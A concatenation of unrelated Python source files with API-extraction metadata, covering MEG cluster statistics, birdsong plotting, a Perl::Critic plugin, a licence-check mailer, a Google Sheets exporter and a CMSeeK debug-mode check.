'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_FBDIV', description='', offset=43 << 2,\n bitSize=6, bitOffset=0, base=pr.UInt, mode='RW')\n", (8704, 8808), True, 'import pyrogue as pr\n'), ((8985, 9110), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_CFG_WRD0"""', 'description': '""""""', 'offset': '(44 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_CFG_WRD0', description='', offset=44 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (9002, 9110), True, 'import pyrogue as pr\n'), ((9292, 9417), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_CFG_WRD1"""', 'description': '""""""', 'offset': '(45 << 2)', 'bitSize': '(11)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_CFG_WRD1', description='', offset=45 << 2,\n bitSize=11, bitOffset=0, base=pr.UInt, mode='RW')\n", (9309, 9417), True, 'import pyrogue as pr\n')]
|
import pytest
import json
from ..embedding.model import EmbeddingModel
from ..feature_extraction import FeatureExtraction
import numpy as np
class TestFeatureExtraction():
@classmethod
def setup_class(self):
self.embedder_DE = EmbeddingModel(lang="de")
self.embedder_EN = EmbeddingModel(lang="en")
self.fe_DE = FeatureExtraction(self.embedder_DE, None)
self.fe_EN = FeatureExtraction(self.embedder_EN, None)
def test_mean_of_pairwise_cosine_distances(self):
ems = np.array([
[-1,1,1],
[-11,3,9],
[22,0,8]
], dtype=float)
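        # The pairwise cosine distances here are roughly 0.0858, 1.3453 and
        # 1.5000; their mean is about 0.9770, matching the expectation below.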
assert abs(0.9770 - FeatureExtraction.mean_of_pairwise_cosine_distances(ems)) < 1e-4
def test_keywords_similarity_DE(self):
keywords_sim = [
"Huhn",
"Ei",
"Vogel",
"Geflügel"
]
keywords_diff = [
"Code",
"Geflügel",
"Siebträger",
"<NAME>"
]
ss_sim = self.fe_DE.get_keywords_similarity(keywords_sim)
ss_diff = self.fe_DE.get_keywords_similarity(keywords_diff)
assert ss_sim < ss_diff
def test_keywords_similarity_empty_DE(self):
empty = []
ss = self.fe_DE.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_one_DE(self):
empty = ["test"]
ss = self.fe_DE.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_EN(self):
keywords_sim = [
"Chicken",
"Egg",
"Bird",
"Poultry"
]
keywords_diff = [
"Code",
"Poultry",
"Portafilter",
"Donald Trump"
]
ss_sim = self.fe_EN.get_keywords_similarity(keywords_sim)
ss_diff = self.fe_EN.get_keywords_similarity(keywords_diff)
assert ss_sim < ss_diff
def test_keywords_similarity_empty_EN(self):
empty = []
ss = self.fe_EN.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_one_EN(self):
empty = ["test"]
ss = self.fe_EN.get_keywords_similarity(empty)
assert ss == 0
|
[
"numpy.array"
] |
[((518, 578), 'numpy.array', 'np.array', (['[[-1, 1, 1], [-11, 3, 9], [22, 0, 8]]'], {'dtype': 'float'}), '([[-1, 1, 1], [-11, 3, 9], [22, 0, 8]], dtype=float)\n', (526, 578), True, 'import numpy as np\n')]
|
import config
import mailer
import datetime
import dbcon
from dateutil.relativedelta import relativedelta
personen = dbcon.personen()
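# dbcon.personen() is assumed to return a dict mapping each Abteilung (department)
# to a list of person records; see the append into personen[person["abteilung"]] below.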
abteilungsconfig = dbcon.abteilungsconfig()
for p in dbcon.persons_fuehr():
person = {}
person["id"] = str(p[0])
person["abteilung"] = str(p[1])
person["anrede"] = str(p[2])
person["name"] = str(p[3])
person["vorname"] = p[4]
person["fuehrerschein"] = p[5]
person["pruefokdat"] = "N/A"
person["pruefnextdat"] = "N/A"
person["ungueltig"] = ""
pruefokdat = dbcon.pruefokdat_fuehr(p[0])
if isinstance(pruefokdat[0], datetime.date):
person["pruefokdat"] = pruefokdat[0].isoformat()
pruefnextdat = dbcon.pruefnextdat_fuehr(person["id"], pruefokdat)
if isinstance(pruefnextdat[0], datetime.date):
person["pruefnextdat"] = pruefnextdat[0].isoformat()
today = datetime.date.today()
            if pruefnextdat[0] < today:
                person["ungueltig"] = "<font color=red>ungültig</font>"
            elif pruefnextdat[0] < today + relativedelta(months=3):
                person["ungueltig"] = "<font color=orange>kontaktieren!</font>"
    else:
        pruefnextdat = dbcon.pruefnextdat_fuehr(person["id"])
        if isinstance(pruefnextdat[0], datetime.date):
            person["pruefnextdat"] = pruefnextdat[0].isoformat()
            today = datetime.date.today()
            if pruefnextdat[0] < today:
                person["ungueltig"] = "<font color=red>ungültig</font>"
            elif pruefnextdat[0] < today + relativedelta(months=3):
                person["ungueltig"] = "<font color=orange>kontaktieren!</font>"
        else:
            person["pruefnextdat"] = "N/A"
            person["ungueltig"] = "<font color=red>ungültig</font>"
if abteilungsconfig[person["abteilung"]]["send_fuehr"] == "1":
person["fuehrerschein"] = person["fuehrerschein"].replace("C1", "XX")
person["fuehrerschein"] = person["fuehrerschein"].replace("c1", "XX")
if "C" in person["fuehrerschein"] or (abteilungsconfig[person["abteilung"]]["include_c1_drivers"] == "1" and "XX" in person["fuehrerschein"] ) :
person["fuehrerschein"] = person["fuehrerschein"].replace("XX", "C1")
personen[person["abteilung"]].append(person)
print("DEBUG: ================= personen dict ================= " )
print(personen)
print("DEBUG: ================= abteilungsconfig dict ================= ")
print(abteilungsconfig)
for k in personen.keys():
mailer.send_mail_fuehr(k, personen[k])
|
[
"dbcon.persons_fuehr",
"dbcon.abteilungsconfig",
"mailer.send_mail_fuehr",
"dbcon.pruefokdat_fuehr",
"datetime.date.today",
"dbcon.pruefnextdat_fuehr",
"dbcon.personen"
] |
[((106, 122), 'dbcon.personen', 'dbcon.personen', ([], {}), '()\n', (120, 122), False, 'import dbcon\n'), ((142, 166), 'dbcon.abteilungsconfig', 'dbcon.abteilungsconfig', ([], {}), '()\n', (164, 166), False, 'import dbcon\n'), ((177, 198), 'dbcon.persons_fuehr', 'dbcon.persons_fuehr', ([], {}), '()\n', (196, 198), False, 'import dbcon\n'), ((501, 529), 'dbcon.pruefokdat_fuehr', 'dbcon.pruefokdat_fuehr', (['p[0]'], {}), '(p[0])\n', (523, 529), False, 'import dbcon\n'), ((2394, 2432), 'mailer.send_mail_fuehr', 'mailer.send_mail_fuehr', (['k', 'personen[k]'], {}), '(k, personen[k])\n', (2416, 2432), False, 'import mailer\n'), ((650, 700), 'dbcon.pruefnextdat_fuehr', 'dbcon.pruefnextdat_fuehr', (["person['id']", 'pruefokdat'], {}), "(person['id'], pruefokdat)\n", (674, 700), False, 'import dbcon\n'), ((1126, 1164), 'dbcon.pruefnextdat_fuehr', 'dbcon.pruefnextdat_fuehr', (["person['id']"], {}), "(person['id'])\n", (1150, 1164), False, 'import dbcon\n'), ((825, 846), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (844, 846), False, 'import datetime\n'), ((1289, 1310), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1308, 1310), False, 'import datetime\n')]
|
import git
class RemotePackage:
    def __init__(self, url: str, name: str, download: bool = True):
        # clone the repository unless downloading is explicitly disabled
        self.repo = git.Repo.clone_from(url, to_path=name) if download else None
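# Example usage (illustrative; the URL and directory name are placeholders):
#   pkg = RemotePackage("https://github.com/user/repo.git", "repo")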
class LocalPackage:
def __init__(self, path):
self.path = path
|
[
"git.Repo.clone_from"
] |
[((122, 160), 'git.Repo.clone_from', 'git.Repo.clone_from', (['url'], {'to_path': 'name'}), '(url, to_path=name)\n', (141, 160), False, 'import git\n')]
|
"""
Apply cluster correction for independent-samples T-test based on spatial proximity and cluster size.
Inspired by MNE tutorial.
Created on Fri Feb 22 13:21:40 2019
@author: <NAME> <<EMAIL>>
"""
import numpy as np
from scipy import stats
from scipy.io import loadmat
import matplotlib.pyplot as plt
import os
from permutation_cluster_test_AT import _permutation_cluster_test_AT
print(__doc__)
#%% file paths
conn = '/media/cbru/SMEDY/scripts_speech_rest/stats/mantel/connectivity.npy'
results_dir = '/media/cbru/SMEDY/results/dys_con_contrast/2020_02_redo_subject_perm/'
read_dir = '/media/cbru/SMEDY/DATA/group_fake_iscs/'
#%% read connectivity
print('Read connectivity.')
connectivity = np.load(conn)
connectivity_sparse = connectivity[()]
#%% cluster correction
# for each permutation:
# 1. Compute the test statistic for each voxel individually.
# 2. Threshold the test statistic values.
# 3. Cluster voxels that exceed this threshold (with the same sign) based on adjacency.
# 4. Retain the size of the largest cluster (measured, e.g., by a simple voxel count,
# or by the sum of voxel t-values within the cluster) to build the null distribution.
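# Illustrative aside (not part of the original pipeline): instead of reading the
# cutoff off the histogram further below, a percentile of this null distribution
# of maximum cluster sizes would give the cluster-level threshold directly, e.g.
#   cutoff_95 = np.percentile(max_clu_lens, 95)  # alpha = 0.05, one-sided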
# define conditions
cons = '_1' # '_1' listening to speech
freqs = {'5.000000e-01-4Hz', '4-8Hz', '8-12Hz', '12-25Hz', '25-45Hz', '55-90Hz'}
if cons == '_1':
window = '_613'
elif cons == '_2':
window = '_579'
else:
print('Check condition!')
for freq in freqs:
if os.path.isfile(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat'):
print(cons + ' ' + freq)
# read in fake and actual T-test results
fake_values = loadmat(read_dir + 'fake_t_vals_' + freq +
window + cons + '.mat')['fake_t_vals']
real_values = loadmat(read_dir + 'real_t_vals_' + freq + window + cons +
'.mat')['real_t_vals']
# get threshold
threshold = loadmat(read_dir + 'tthreshold_uncorrected_' + freq +
window + cons + '.mat')['tthreshold_uncorrected']
print(threshold)
# reshape fake_values to (n_observations, n_times, n_vertices)
fake_values = fake_values[:, :, np.newaxis]
fake_values = fake_values.reshape((5000, 1, 20484))
# reshape real_values
real_values = real_values[:, :, np.newaxis]
real_values = real_values.reshape((1, 1, 20484))
# search for clusters (only once)
# max_clu_lens, clusters = _permutation_cluster_test_AT(fake_values,
# threshold=threshold[0][0],
# n_permutations=5000,
# tail=0,
# connectivity=connectivity_sparse,
# n_jobs=4, seed=10,
# max_step=1, t_power=1,
# out_type='indices',
# exclude=None,
# step_down_p=0,
# check_disjoint=False,
# buffer_size=1000)
#
# np.save(results_dir + 'max_clu_lens_' + freq + window + cons, max_clu_lens)
max_clu_lens = np.load(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')
# null distribution
plt.figure(0)
plt.hist(max_clu_lens)
kde = stats.gaussian_kde(max_clu_lens)
x = np.linspace(max_clu_lens.min(), max_clu_lens.max(), 100)
p = kde(x)
# cutoff for a cluster size that is significant
plt.figure(1)
plt.plot(x, p)
plt.hlines(0.095, 0, 14) # visualization of cutoff
# take maximum across all freq bands
cutoff = np.max(max_clu_lens)
print(['cutoff length is ', cutoff])
max_clu_lens2, clusters = _permutation_cluster_test_AT(real_values,
threshold=threshold[0][0],
n_permutations=1,
tail=0,
connectivity=connectivity_sparse,
n_jobs=4, seed=10,
max_step=1,
t_power=1,
out_type='indices',
exclude=None,
step_down_p=0,
check_disjoint=False,
buffer_size=1000)
# length of all initial clusters
clu_lens = np.zeros(len(clusters))
for j in range(0, len(clusters)):
clu_lens[j] = len(clusters[j][0])
# hists
plt.figure(1)
plt.hist(max_clu_lens)
plt.hist(clu_lens)
# out in format required by MNE cluster function (for visualization)
t_out = real_values.reshape(1, 20484)
clusters_new = clusters
for c, l, i in zip(clusters, clu_lens, range(0, len(clusters))):
            clusters_new[i] = np.zeros(int(l), dtype='int'), c[0]
clu = t_out, clusters_new
np.save(results_dir + 'clu_' + freq + window + cons, clu)
# see how many clusters exceed the threshold (i.e. survive the correction)
ids = np.where(clu_lens > cutoff)[0]
clu_sig = clusters[0:len(ids)]
for i in range(0, len(ids)):
clu_sig[i] = clusters[ids[i]]
sig_clu_lens = np.zeros(len(clu_sig))
for j in range(0, len(clu_sig)):
sig_clu_lens[j] = len(clu_sig[j][0])
    else:
        print('No uncorrected p-vals < 0.05 for ' + freq)
|
[
"permutation_cluster_test_AT._permutation_cluster_test_AT",
"numpy.load",
"numpy.save",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.plot",
"scipy.io.loadmat",
"scipy.stats.gaussian_kde",
"os.path.isfile",
"matplotlib.pyplot.figure",
"numpy.max",
"numpy.where",
"numpy.int",
"matplotlib.pyplot.hlines"
] |
[((700, 713), 'numpy.load', 'np.load', (['conn'], {}), '(conn)\n', (707, 713), True, 'import numpy as np\n'), ((1462, 1535), 'os.path.isfile', 'os.path.isfile', (["(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')\n", (1476, 1535), False, 'import os\n'), ((3735, 3805), 'numpy.load', 'np.load', (["(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')"], {}), "(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')\n", (3742, 3805), True, 'import numpy as np\n'), ((3858, 3871), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {}), '(0)\n', (3868, 3871), True, 'import matplotlib.pyplot as plt\n'), ((3884, 3906), 'matplotlib.pyplot.hist', 'plt.hist', (['max_clu_lens'], {}), '(max_clu_lens)\n', (3892, 3906), True, 'import matplotlib.pyplot as plt\n'), ((3925, 3957), 'scipy.stats.gaussian_kde', 'stats.gaussian_kde', (['max_clu_lens'], {}), '(max_clu_lens)\n', (3943, 3957), False, 'from scipy import stats\n'), ((4126, 4139), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (4136, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4152, 4166), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'p'], {}), '(x, p)\n', (4160, 4166), True, 'import matplotlib.pyplot as plt\n'), ((4179, 4203), 'matplotlib.pyplot.hlines', 'plt.hlines', (['(0.095)', '(0)', '(14)'], {}), '(0.095, 0, 14)\n', (4189, 4203), True, 'import matplotlib.pyplot as plt\n'), ((4300, 4320), 'numpy.max', 'np.max', (['max_clu_lens'], {}), '(max_clu_lens)\n', (4306, 4320), True, 'import numpy as np\n'), ((4421, 4692), 'permutation_cluster_test_AT._permutation_cluster_test_AT', '_permutation_cluster_test_AT', (['real_values'], {'threshold': 'threshold[0][0]', 'n_permutations': '(1)', 'tail': '(0)', 'connectivity': 'connectivity_sparse', 'n_jobs': '(4)', 'seed': '(10)', 'max_step': '(1)', 't_power': '(1)', 'out_type': '"""indices"""', 'exclude': 'None', 'step_down_p': '(0)', 'check_disjoint': '(False)', 'buffer_size': '(1000)'}), "(real_values, threshold=threshold[0][0],\n n_permutations=1, tail=0, connectivity=connectivity_sparse, n_jobs=4,\n seed=10, max_step=1, t_power=1, out_type='indices', exclude=None,\n step_down_p=0, check_disjoint=False, buffer_size=1000)\n", (4449, 4692), False, 'from permutation_cluster_test_AT import _permutation_cluster_test_AT\n'), ((5723, 5736), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (5733, 5736), True, 'import matplotlib.pyplot as plt\n'), ((5749, 5771), 'matplotlib.pyplot.hist', 'plt.hist', (['max_clu_lens'], {}), '(max_clu_lens)\n', (5757, 5771), True, 'import matplotlib.pyplot as plt\n'), ((5784, 5802), 'matplotlib.pyplot.hist', 'plt.hist', (['clu_lens'], {}), '(clu_lens)\n', (5792, 5802), True, 'import matplotlib.pyplot as plt\n'), ((6188, 6245), 'numpy.save', 'np.save', (["(results_dir + 'clu_' + freq + window + cons)", 'clu'], {}), "(results_dir + 'clu_' + freq + window + cons, clu)\n", (6195, 6245), True, 'import numpy as np\n'), ((1653, 1719), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')\n", (1660, 1719), False, 'from scipy.io import loadmat\n'), ((1801, 1867), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'real_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'real_t_vals_' + freq + window + cons + '.mat')\n", (1808, 1867), False, 'from scipy.io import loadmat\n'), ((1978, 2055), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'tthreshold_uncorrected_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'tthreshold_uncorrected_' + freq + window + cons + '.mat')\n", (1985, 2055), False, 'from scipy.io import loadmat\n'), ((6360, 6387), 'numpy.where', 'np.where', (['(clu_lens > cutoff)'], {}), '(clu_lens > cutoff)\n', (6368, 6387), True, 'import numpy as np\n'), ((6099, 6108), 'numpy.int', 'np.int', (['l'], {}), '(l)\n', (6105, 6108), True, 'import numpy as np\n')]
|
"""Apply Perl::Critic tool and gather results."""
from __future__ import print_function
import subprocess
from statick_tool.issue import Issue
from statick_tool.tool_plugin import ToolPlugin
class PerlCriticToolPlugin(ToolPlugin):
"""Apply Perl::Critic tool and gather results."""
def get_name(self):
"""Get name of tool."""
return "perlcritic"
def gather_args(self, args):
"""Gather arguments."""
args.add_argument("--perlcritic-bin", dest="perlcritic_bin", type=str,
help="perlcritic binary path")
def scan(self, package, level):
"""Run tool and gather output."""
if "perl_src" not in package:
return []
if not package["perl_src"]:
return []
perlcritic_bin = "perlcritic"
if self.plugin_context.args.perlcritic_bin is not None:
perlcritic_bin = self.plugin_context.args.perlcritic_bin
flags = ["--nocolor", "--verbose=%f:::%l:::%p:::%m:::%s\n"]
flags += self.get_user_flags(level)
files = []
if "perl_src" in package:
files += package["perl_src"]
try:
            output = subprocess.check_output([perlcritic_bin] + flags + files,
                                             stderr=subprocess.STDOUT,
                                             universal_newlines=True)
except subprocess.CalledProcessError as ex:
output = ex.output
if ex.returncode != 2:
print("perlcritic failed! Returncode = {}".
format(str(ex.returncode)))
print("{}".format(ex.output))
return []
except OSError as ex:
print("Couldn't find %s! (%s)" % (perlcritic_bin, ex))
return []
if self.plugin_context.args.show_tool_output:
print("{}".format(output))
with open(self.get_name() + ".log", "wt") as f:
f.write(output)
issues = self.parse_output(output.split('\n'))
return issues
def parse_output(self, output):
"""Parse tool output and report issues."""
issues = []
# Load the plugin mapping if possible
warnings_mapping = self.load_mapping()
for line in output:
split_line = line.strip().split(':::')
# Should split into five segments, anything less is invalid.
if len(split_line) < 5:
continue
cert_reference = None
if split_line[2].replace('::', '__') in warnings_mapping.keys():
cert_reference = warnings_mapping[split_line[2].replace('::', '__')]
issues.append(Issue(split_line[0], split_line[1],
self.get_name(), split_line[2],
split_line[4], split_line[3], cert_reference))
return issues
|
[
"subprocess.check_output"
] |
[((1189, 1302), 'subprocess.check_output', 'subprocess.check_output', (['([perlcritic_bin] + flags + files)'], {'stderr': 'subprocess.STDOUT', 'universal_newlines': '(True)'}), '([perlcritic_bin] + flags + files, stderr=subprocess\n .STDOUT, universal_newlines=True)\n', (1212, 1302), False, 'import subprocess\n')]
|
#! /usr/bin/python3
import gspread
import json
import os
import re
from oauth2client.service_account import ServiceAccountCredentials
from util import author_to_file_path, get_excerpt_from_page, get_valid_author_slug, title_to_file_path
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
articles = client.open("Bitcoin Resources").worksheet("Curations")
for idx, row in enumerate(articles.get_all_values()):
if row[0] == 'Title':
continue
    curation_title = row[0].strip()
    curation_link = row[1]
    curation_author = row[2].strip()
    curation_type = row[3].strip()
    curation_star = row[4].strip()
md_file_path = title_to_file_path(curation_title, 'curations')
if md_file_path == "":
continue
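    # assemble YAML front matter for the curation page (Jekyll-style layout/title fields)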
md_file = (
f"---\n"
f"layout: page\n"
f"title: {curation_title}\n"
f"link: {curation_link}\n"
f"author: {curation_author}\n"
f"type: {curation_type}\n"
f"star: {curation_star}\n"
f"order: {idx}\n"
f"---\n")
with open(md_file_path, 'w') as f:
f.write(md_file)
|
[
"oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name",
"gspread.authorize",
"util.title_to_file_path"
] |
[((347, 424), 'oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name', 'ServiceAccountCredentials.from_json_keyfile_name', (['"""client_secret.json"""', 'scope'], {}), "('client_secret.json', scope)\n", (395, 424), False, 'from oauth2client.service_account import ServiceAccountCredentials\n'), ((434, 458), 'gspread.authorize', 'gspread.authorize', (['creds'], {}), '(creds)\n', (451, 458), False, 'import gspread\n'), ((856, 903), 'util.title_to_file_path', 'title_to_file_path', (['curation_title', '"""curations"""'], {}), "(curation_title, 'curations')\n", (874, 903), False, 'from util import author_to_file_path, get_excerpt_from_page, get_valid_author_slug, title_to_file_path\n')]
|
"""Plotting function for birdsonganalysis."""
import numpy as np
import seaborn as sns
import matplotlib.patches as p
import matplotlib.pyplot as plt
from .songfeatures import spectral_derivs
from .constants import FREQ_RANGE
def spectral_derivs_plot(spec_der, contrast=0.1, ax=None, freq_range=None,
fft_step=None, fft_size=None):
"""
Plot the spectral derivatives of a song in a grey scale.
spec_der - The spectral derivatives of the song (computed with
`spectral_derivs`) or the song itself
contrast - The contrast of the plot
ax - The matplotlib axis where the plot must be drawn, if None, a new axis
is created
    freq_range - The amount of frequency to plot, useful only if `spec_der` is
                 a song. Given to `spectral_derivs`
    fft_step, fft_size - The FFT step and window size, useful only if
                 `spec_der` is a song. Given to `spectral_derivs`
"""
if spec_der.ndim == 1:
spec_der = spectral_derivs(spec_der, freq_range, fft_step, fft_size)
ax = sns.heatmap(spec_der.T, yticklabels=50, xticklabels=50,
vmin=-contrast, vmax=contrast, ax=ax, cmap='Greys',
cbar=False)
ax.invert_yaxis()
return ax
def plot_over_spec(data, ax, freq_range=FREQ_RANGE, zoom=1, **plot_params):
"""
Plot the feature over a spectral derivatives plot.
The data are first normalized then rescale to fit the ylim of the axis.
"""
# Normalize the data so that they fit in the graph
ndata = (data - np.nanmin(data)) / (np.nanmax(data) - np.nanmin(data))
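    # i.e. a NaN-aware min-max rescale into [0, 1]; e.g. data = [2, 5, 8] maps to [0.0, 0.5, 1.0]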
# We take for abscisse axis the line corresponding to 5% of freq_range
# We rescale the data so that they take 75% of the graph
ax.plot(zoom * (5/100 * freq_range + 75/100 * freq_range * ndata),
**plot_params)
return ax
def similarity_plot(sim, song, refsong):
"""Do a similarity plot with the result of `bsa.similarity`."""
fig, ax = plt.subplots(2, 2, figsize=(13, 13),
gridspec_kw={'width_ratios': [1, 4],
'height_ratios': [1, 4]})
ax[0, 0].axis('off')
sds = spectral_derivs(song)
sdr = spectral_derivs(refsong)
ax[0, 1] = spectral_derivs_plot(sds, 0.05, ax[0, 1])
ax[0, 1].set_title('Song')
ax[1, 0] = spectral_derivs_plot(np.flip(sdr.T, 1), 0.05,
ax[1, 0])
ax[1, 0].set_title('Reference Song')
ax[1, 1] = sns.heatmap(sim['glob_matrix'], ax=ax[1, 1], cbar=False,
vmin=0, vmax=1)
for section in sim['sections']:
xy = (section['beg'][0],
sim['glob_matrix'].shape[1] - section['end'][1])
width = section['end'][0] - section['beg'][0]
height = section['end'][1] - section['beg'][1]
ax[1, 1].add_patch(p.Rectangle(xy, width, height, fill=False,
edgecolor='y', linewidth=3))
return fig
|
[
"numpy.flip",
"seaborn.heatmap",
"matplotlib.patches.Rectangle",
"numpy.nanmin",
"matplotlib.pyplot.subplots",
"numpy.nanmax"
] |
[((1018, 1141), 'seaborn.heatmap', 'sns.heatmap', (['spec_der.T'], {'yticklabels': '(50)', 'xticklabels': '(50)', 'vmin': '(-contrast)', 'vmax': 'contrast', 'ax': 'ax', 'cmap': '"""Greys"""', 'cbar': '(False)'}), "(spec_der.T, yticklabels=50, xticklabels=50, vmin=-contrast,\n vmax=contrast, ax=ax, cmap='Greys', cbar=False)\n", (1029, 1141), True, 'import seaborn as sns\n'), ((1945, 2048), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(13, 13)', 'gridspec_kw': "{'width_ratios': [1, 4], 'height_ratios': [1, 4]}"}), "(2, 2, figsize=(13, 13), gridspec_kw={'width_ratios': [1, 4],\n 'height_ratios': [1, 4]})\n", (1957, 2048), True, 'import matplotlib.pyplot as plt\n'), ((2455, 2527), 'seaborn.heatmap', 'sns.heatmap', (["sim['glob_matrix']"], {'ax': 'ax[1, 1]', 'cbar': '(False)', 'vmin': '(0)', 'vmax': '(1)'}), "(sim['glob_matrix'], ax=ax[1, 1], cbar=False, vmin=0, vmax=1)\n", (2466, 2527), True, 'import seaborn as sns\n'), ((2328, 2345), 'numpy.flip', 'np.flip', (['sdr.T', '(1)'], {}), '(sdr.T, 1)\n', (2335, 2345), True, 'import numpy as np\n'), ((1517, 1532), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (1526, 1532), True, 'import numpy as np\n'), ((1537, 1552), 'numpy.nanmax', 'np.nanmax', (['data'], {}), '(data)\n', (1546, 1552), True, 'import numpy as np\n'), ((1555, 1570), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (1564, 1570), True, 'import numpy as np\n'), ((2823, 2893), 'matplotlib.patches.Rectangle', 'p.Rectangle', (['xy', 'width', 'height'], {'fill': '(False)', 'edgecolor': '"""y"""', 'linewidth': '(3)'}), "(xy, width, height, fill=False, edgecolor='y', linewidth=3)\n", (2834, 2893), True, 'import matplotlib.patches as p\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 Tuhinshubhra
import cmseekdb.basic as cmseek
# I know there is no reason at all to create a separate module for this.. there's something that's going to be added here so.. trust me!
def start(source):
# print(source)
if 'Joomla! Debug Console' in source or 'xdebug.org/docs/all_settings' in source:
cmseek.success('Debug mode on!')
return '1'
else:
return '0'
|
[
"cmseekdb.basic.success"
] |
[((452, 484), 'cmseekdb.basic.success', 'cmseek.success', (['"""Debug mode on!"""'], {}), "('Debug mode on!')\n", (466, 484), True, 'import cmseekdb.basic as cmseek\n')]
|
# -*- coding: utf-8 -*-
# Authors: <NAME>; <NAME>; <NAME> <<EMAIL>>
#
#
# License: BSD (3-clause)
import numpy as np
import mnefun
import os
#import glob
os.chdir('/home/sjjoo/git/BrainTools/projects/NLR_MEG')
from score import score
from nlr_organizeMEG_mnefun import nlr_organizeMEG_mnefun
import mne
import time
#import pycuda.driver
#import pycuda.autoinit
t0 = time.time()
mne.set_config('MNE_USE_CUDA', 'true')
# At Possum projects folder mounted in the local disk
raw_dir = '/mnt/diskArray/projects/MEG/nlr/raw'
# At local hard drive
out_dir = '/mnt/scratch/NLR_MEG_Sensor'
if not os.path.isdir(out_dir):
os.mkdir(out_dir)
subs = ['NLR_102_RS','NLR_103_AC','NLR_105_BB','NLR_110_HH','NLR_127_AM',
'NLR_130_RW','NLR_132_WP','NLR_133_ML','NLR_145_AC','NLR_150_MG',
'NLR_151_RD','NLR_152_TC','NLR_160_EK','NLR_161_AK','NLR_163_LF',
'NLR_164_SF','NLR_170_GM','NLR_172_TH','NLR_174_HS','NLR_179_GM',
'NLR_180_ZD','NLR_187_NB','NLR_201_GS','NLR_203_AM',
'NLR_204_AM','NLR_205_AC','NLR_206_LM','NLR_207_AH','NLR_211_LB',
'NLR_GB310','NLR_KB218','NLR_JB423','NLR_GB267','NLR_JB420',
'NLR_HB275','NLR_197_BK','NLR_GB355','NLR_GB387','NLR_HB205',
'NLR_IB217','NLR_IB319','NLR_JB227','NLR_JB486','NLR_KB396',
'NLR_IB357']
# tmin, tmax: sets the epoch
# bmin, bmax: sets the prestim duration for baseline correction. baseline is set
# as individual as default. Refer to _mnefun.py bmax is 0.0 by default
# hp_cut, lp_cut: set cutoff frequencies for highpass and lowpass
# I found that hp_cut of 0.03 is problematic because the tansition band is set
# to 5 by default, which makes the negative stopping frequency (0.03-5).
# It appears that currently data are acquired (online) using bandpass filter
# (0.03 - 326.4 Hz), so it might be okay not doing offline highpass filtering.
# It's worth checking later though. However, I think we should do baseline
# correction by setting bmin and bmax. I found that mnefun does baseline
# correction by default.
# sjjoo_20160809: Commented
#params = mnefun.Params(tmin=-0.1, tmax=0.9, n_jobs=18, # t_adjust was -39e-3
# decim=2, n_jobs_mkl=1, proj_sfreq=250,
# n_jobs_fir='cuda', n_jobs_resample='cuda',
# filter_length='5s', epochs_type='fif', lp_cut=40.,
## hp_cut=0.15,hp_trans=0.1,
# bmin=-0.1, auto_bad=20., plot_raw=False,
# bem_type = '5120-5120-5120')
# This sets the position of the head relative to the sensors. These values a
# A typical head position. So now in sensor space everyone is aligned. However
# We should also note that for source analysis it is better to leave this as
# the mne-fun default ==> Let's put None!!!
""" Organize subjects """
#out,ind = nlr_organizeMEG_mnefun(raw_dir=raw_dir,out_dir=out_dir,subs=subs)
""" The directory structure is really messy -- let's not use this function. """
os.chdir(out_dir)
#
#print(out)
#params.subjects.sort() # Sort the subject list
#print("Done sorting subjects.\n")
""" Attention!!!
164_sf160707_4_raw.fif: continuous HPI was not active in this file!
170_gm160613_5_raw.fif: in _fix_raw_eog_cals...non equal eog arrays???
172_th160825_6_raw.fif: origin of head out of helmet
201_gs150729_2_raw.fif: continuous HPI was not active in this file!
174_hs160620_1_raw.fif: Too many bad channels (62 based on grad=4000e-13, mag=4.0e-12)
174_hs160829_1_raw.fif: Too many bad channels (62 based on grad=4000e-13, mag=4.0e-12)
163_lf160707 : Too many bad channels --> Use grad=5000e-13, mag=5.0e-12
163_lf160920 : : Too many bad channels --> Use grad=5000e-13, mag=5.0e-12
"""
#for n, s in enumerate(badsubs):
# subnum = out.index(s)
# print('Removing subject ' + str(subnum) + ' ' + out[subnum])
# out.remove(s)
# ind[subnum] = []
# ind.remove([])
#%%
